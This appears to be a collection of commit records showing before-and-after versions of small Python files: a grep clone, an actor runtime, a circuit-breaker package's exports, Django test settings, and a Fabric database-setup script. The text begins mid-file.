text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
<commit_msg>Add match and case insensitive methods<commit_after>
|
def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
def get_match(self):
return self.pattern in self.text
def get_match_case_insensitive(self):
self.pattern = self.pattern.lower()
self.text = self.text.lower()
return self.get_match()
|
def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
def rgrep(pattern='', text='', case='', count=False, version=False):
if pattern == '' or text == '':
return display_usage()
elif not count:
if case == 'i':
pattern = pattern.lower()
text = text.lower()
return pattern in text
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
Add match and case insensitive methods
def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
def get_match(self):
return self.pattern in self.text
def get_match_case_insensitive(self):
self.pattern = self.pattern.lower()
self.text = self.text.lower()
return self.get_match()
|
<commit_before>def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
def rgrep(pattern='', text='', case='', count=False, version=False):
if pattern == '' or text == '':
return display_usage()
elif not count:
if case == 'i':
pattern = pattern.lower()
text = text.lower()
return pattern in text
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
<commit_msg>Add match and case insensitive methods<commit_after>def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
def get_match(self):
return self.pattern in self.text
def get_match_case_insensitive(self):
self.pattern = self.pattern.lower()
self.text = self.text.lower()
return self.get_match()
|
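A quick usage sketch for the RGrep class in the record above (not part of the record; the sample pattern and text are made up, and the import assumes src/rgrep.py is on the path):
from rgrep import RGrep  # assumes src/rgrep.py from the record is importable

rg = RGrep()
rg.pattern = "Grep"
rg.text = "RGrep\nrgrep\nno match here"
print(rg.get_version())                 # RGrep (BSD) 0.0.1
print(rg.get_count())                   # 1 line contains "Grep"
print(rg.get_match())                   # True: plain substring test
print(rg.get_match_case_insensitive())  # True: lowercases both sides first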
bd8c5628a6af96a68f1ed6022a983af7a5495529
|
tartpy/rt.py
|
tartpy/rt.py
|
import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message):
spawn(self.behavior, message, method='process')
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
|
import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message, method='thread'):
spawn(self.behavior, message, method)
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
|
Allow arg to specify spawning type
|
Allow arg to specify spawning type
|
Python
|
mit
|
waltermoreira/tartpy
|
import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message):
spawn(self.behavior, message, method='process')
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
Allow arg to specify spawning type
|
import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message, method='thread'):
spawn(self.behavior, message, method)
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
|
<commit_before>import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message):
spawn(self.behavior, message, method='process')
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
<commit_msg>Allow arg to specify spawning type<commit_after>
|
import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message, method='thread'):
spawn(self.behavior, message, method)
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
|
import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message):
spawn(self.behavior, message, method='process')
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
Allow arg to specify spawning type
import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message, method='thread'):
spawn(self.behavior, message, method)
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
|
<commit_before>import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message):
spawn(self.behavior, message, method='process')
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
<commit_msg>Allow arg to specify spawning type<commit_after>import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message, method='thread'):
spawn(self.behavior, message, method)
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
|
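The behavioural change in the record above is that send() now forwards a method argument instead of hard-coding 'process'. A minimal usage sketch (illustrative; assumes the module is importable as tartpy.rt per the record's path):
from tartpy.rt import Sponsor

def echo_beh(message):
    print("echo:", message)

sponsor = Sponsor()
echo = sponsor.create(echo_beh)
echo.send("runs in a thread")                     # new default: threading
echo.send("runs in a process", method="process")  # old behaviour, opt-in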
9f600d66f76d023926d1c1a6c974bd1abba40cfb
|
breakers/__init__.py
|
breakers/__init__.py
|
# -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = [Breaker, ]
__version__ = '0.1'
|
# -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = ['Breaker', ]
__version__ = '0.1'
|
Fix __all__ on module entry point
|
Fix __all__ on module entry point
|
Python
|
apache-2.0
|
marcusmartins/breakers
|
# -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = [Breaker, ]
__version__ = '0.1'
Fix __all__ on module entry point
|
# -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = ['Breaker', ]
__version__ = '0.1'
|
<commit_before># -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = [Breaker, ]
__version__ = '0.1'
<commit_msg>Fix __all__ on module entry point<commit_after>
|
# -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = ['Breaker', ]
__version__ = '0.1'
|
# -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = [Breaker, ]
__version__ = '0.1'
Fix __all__ on module entry point
# -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = ['Breaker', ]
__version__ = '0.1'
|
<commit_before># -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = [Breaker, ]
__version__ = '0.1'
<commit_msg>Fix __all__ on module entry point<commit_after># -*- coding: utf-8 -*-
"""
breakers
~~~~~
Breakers is a simple python package that implements the circuit breaker
pattern.
:copyright: (c) 2015 by Marcus Martins.
:license: Apache License, Version 2.0, see LICENSE for more details.
"""
from .breaker import Breaker
__all__ = ['Breaker', ]
__version__ = '0.1'
|
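Why the breakers fix matters: __all__ must contain attribute names as strings; with the class object itself, a wildcard import raises TypeError because the importer performs a string lookup per item. A small self-contained demonstration (not from the record):
import sys
import types

mod = types.ModuleType("demo_mod")
exec("class Breaker: pass", mod.__dict__)
sys.modules["demo_mod"] = mod

mod.__all__ = [mod.Breaker]  # buggy form: the object, not the name
try:
    exec("from demo_mod import *", {})
except TypeError as exc:
    print("non-string __all__ fails:", exc)

mod.__all__ = ["Breaker"]    # fixed form: the exported name as a string
exec("from demo_mod import *", {})
print("string __all__ imports cleanly")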
926a7e3f8bc3808160bcab439e62b5848345d6f5
|
tests/settings.py
|
tests/settings.py
|
# -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'OPTIONS': {
'builtins': ["easy_pjax.templatetags.pjax_tags"],
'context_processors': ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
|
# -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"APP_DIRS": True,
"OPTIONS": {
"builtins": ["easy_pjax.templatetags.pjax_tags"],
"context_processors": ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
|
Use double quotes for strings
|
Use double quotes for strings
|
Python
|
bsd-3-clause
|
nigma/django-easy-pjax,nigma/django-easy-pjax,nigma/django-easy-pjax
|
# -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'OPTIONS': {
'builtins': ["easy_pjax.templatetags.pjax_tags"],
'context_processors': ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
Use double quotes for strings
|
# -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"APP_DIRS": True,
"OPTIONS": {
"builtins": ["easy_pjax.templatetags.pjax_tags"],
"context_processors": ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
|
<commit_before># -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'OPTIONS': {
'builtins': ["easy_pjax.templatetags.pjax_tags"],
'context_processors': ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
<commit_msg>Use double quotes for strings<commit_after>
|
# -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"APP_DIRS": True,
"OPTIONS": {
"builtins": ["easy_pjax.templatetags.pjax_tags"],
"context_processors": ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
|
# -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'OPTIONS': {
'builtins': ["easy_pjax.templatetags.pjax_tags"],
'context_processors': ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
Use double quotes for strings
# -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"APP_DIRS": True,
"OPTIONS": {
"builtins": ["easy_pjax.templatetags.pjax_tags"],
"context_processors": ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
|
<commit_before># -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'OPTIONS': {
'builtins': ["easy_pjax.templatetags.pjax_tags"],
'context_processors': ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
<commit_msg>Use double quotes for strings<commit_after># -*- coding: utf-8 -*-
import django
DEBUG = False
USE_TZ = True
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"easy_pjax",
"tests"
]
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = "tests.urls"
SECRET_KEY = "secret"
if django.VERSION[:2] >= (1, 8):
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"APP_DIRS": True,
"OPTIONS": {
"builtins": ["easy_pjax.templatetags.pjax_tags"],
"context_processors": ["django.template.context_processors.request"]
}
}
]
else:
TEMPLATE_CONTEXT_PROCESSORS = ["django.core.context_processors.request"]
|
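The easy-pjax settings change above is purely stylistic. If one wanted to enforce the double-quote convention mechanically, a stdlib-only checker could look like this (illustrative sketch, not from the record; prefixed literals such as r'...' would need extra handling):
import tokenize

def single_quoted_strings(path):
    """Yield (line, token) for string literals that start with a single quote."""
    with tokenize.open(path) as fh:
        for tok in tokenize.generate_tokens(fh.readline):
            if tok.type == tokenize.STRING and tok.string.startswith("'"):
                yield tok.start[0], tok.string

for lineno, literal in single_quoted_strings("tests/settings.py"):
    print(f"{lineno}: {literal}")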
4df20c02934e431568105467ee44374bedddf4a5
|
fabfile/dbengine.py
|
fabfile/dbengine.py
|
###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import pgsql_*
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
|
###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import (
pgsql_createuser,
pgsql_dropdb,
pgsql_createdb,
pgsql_dropuser,
)
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
|
Fix 'cant import from .postgresql'
|
Fix 'cant import from .postgresql'
|
Python
|
agpl-3.0
|
miing/mci_migo,miing/mci_migo,miing/mci_migo
|
###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import pgsql_*
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
Fix 'cant import from .postgresql'
|
###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import (
pgsql_createuser,
pgsql_dropdb,
pgsql_createdb,
pgsql_dropuser,
)
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
|
<commit_before>###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import pgsql_*
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
<commit_msg>Fix 'cant import from .postgresql'<commit_after>
|
###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import (
pgsql_createuser,
pgsql_dropdb,
pgsql_createdb,
pgsql_dropuser,
)
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
|
###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import pgsql_*
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
Fix 'cant import from .postgresql'
###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import (
pgsql_createuser,
pgsql_dropdb,
pgsql_createdb,
pgsql_dropuser,
)
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
|
<commit_before>###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import pgsql_*
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
